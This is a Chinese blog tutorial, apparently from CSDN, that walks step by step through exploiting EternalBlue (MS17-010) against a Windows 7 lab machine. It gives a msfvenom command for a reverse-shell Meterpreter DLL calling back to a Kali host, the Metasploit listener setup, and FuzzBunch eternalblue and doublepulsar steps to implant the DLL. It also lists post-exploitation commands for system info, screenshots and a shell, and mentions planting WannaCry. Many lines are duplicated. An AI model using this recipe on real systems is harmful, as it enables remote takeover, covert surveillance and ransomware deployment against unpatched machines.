漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010

一. 准备

- 靶机(被攻击电脑)
靶机我们只需要知道系统信息和IP,我这里开的是虚拟机win7,IP:192.168.1.110
靶机我们只需要知道系统信息和IP,我这里开的是虚拟机win7,IP:192.168.1.110

- 攻击机(运行攻击程序)
攻击机用的是32位Windows XP sp3,IP:192.168.1.111,用来运行攻击程序,注入木马dll,运行永恒之蓝(eternalblue)需要安装Python2.6和pywin32-221
攻击机用的是32位Windows XP sp3,IP:192.168.1.111,用来运行攻击程序,注入木马dll,运行永恒之蓝(eternalblue)需要安装Python2.6和pywin32-221

- 控制机(控制端)
这里用kalilinux虚拟机,IP:192.168.1.114,用来生成木马文件dll,生成攻击负载,控制被入侵的电脑
这里用kali虚拟机,IP:192.168.1.114,用来生成木马文件dll,生成攻击负载,控制被入侵的电脑

- 工具
shadowbroker-master,存放在攻击机中
shadowbroker-master,存放在攻击机中

二.生成dll文件

- 命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.114 LPORT=5555 -f dll>launcher.dll
生成dll
- 将dll文件复制到攻击机,等待攻击机调用
复制到攻击机中随意位置,记住路径就行了后面会用到
复制到攻击机中随意位置,记住路径就行了后面会用到

三、kali控制端开启监听

  • kali终端输入:msfconsole启动metasploit
    metasploit启动图很经典,忍不住放多一张
    metasploit启动图很经典,忍不住放多一张
    这里写图片描述
    - 依次输入命令开启监听:
    set LHOST 192.168.1.114
    set LPORT 5555
    set payload windows/x64/meterpreter/reverse_tcp
    exploit

    这里写图片描述

    四.运行攻击程序

    - 新建目录listeningposts
    切换至shadowbroker-master下Windows目录下新建listeningpost目录,否则后面调用运行.py程序会报错

  • 切换至shadowbroker-master下Windows目录下新建listeningpost目录,否则后面调用运行.py程序会报错

    - 运行攻击程序fb.py
    将工具包中windows目录下的fb.py用cmd执行
    将工具包中windows目录下的fb.py用cmd执行

    - 设置程序参数
    输入靶机、攻击机IP地址,设置日志路径
    输入靶机、攻击机IP地址,设置日志路径

    - 使用永恒之蓝攻击:use eternalblue
    输入命令,默认回车即可

  • 输入命令,默认回车即可
    攻击目标、模块选择FB
  • 攻击目标、模块选择FB
    看到这里就显示成功了
    看到这里就显示成功了
    -利用doublepulsar植入生成的dll文件
    输入命令:use doublepulsar
    输入命令:use doublepulsar
    选择SMB攻击、攻击机x64、选择RunDLL植入我们的木马程序、输入我们生成的dll文件路径
    选择SMB攻击、攻击机x64、选择RunDLL植入我们的木马程序、输入我们生成的dll文件路径
    看到这个就植入dll木马成功了,攻击也结束了,回去看我们的控制端kali
    看到这个就植入dll木马成功了,攻击也结束了,回去看我们的控制端kali

    五. 后期控制

    可以看到我们的kali控制端已经控制监听攻击机
    可以看到我们的kali控制端已经控制监听攻击机
    可以看到这时靶机毫无反应
    可以看到这时靶机毫无反应

  • 收集靶机信息
    输入命令:sysinfo获取靶机系统信息
    输入命令:sysinfo获取靶机系统信息
    输入命令:route获取路由信息
    输入命令:route获取路由信息

  • 好玩的
    输入命令:screenshot抓取靶机桌面
    输入命令:screenshot抓取靶机桌面
    其实到这里控制端已经是完全控制靶机,且靶机完全不知道……wannacry就是利用这工具漏洞整的
    shell得到和靶机一样的cmd命令窗口
    输入命令:shell得到和靶机一样的cmd命令窗口
    向靶机植入wannacry病毒
    这里写图片描述

`

阅读更多
文章标签: 漏洞 永恒之蓝
个人分类: 漏洞 渗透 工具类
上一篇ARP欺骗获取同网段信息
下一篇常用命令
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭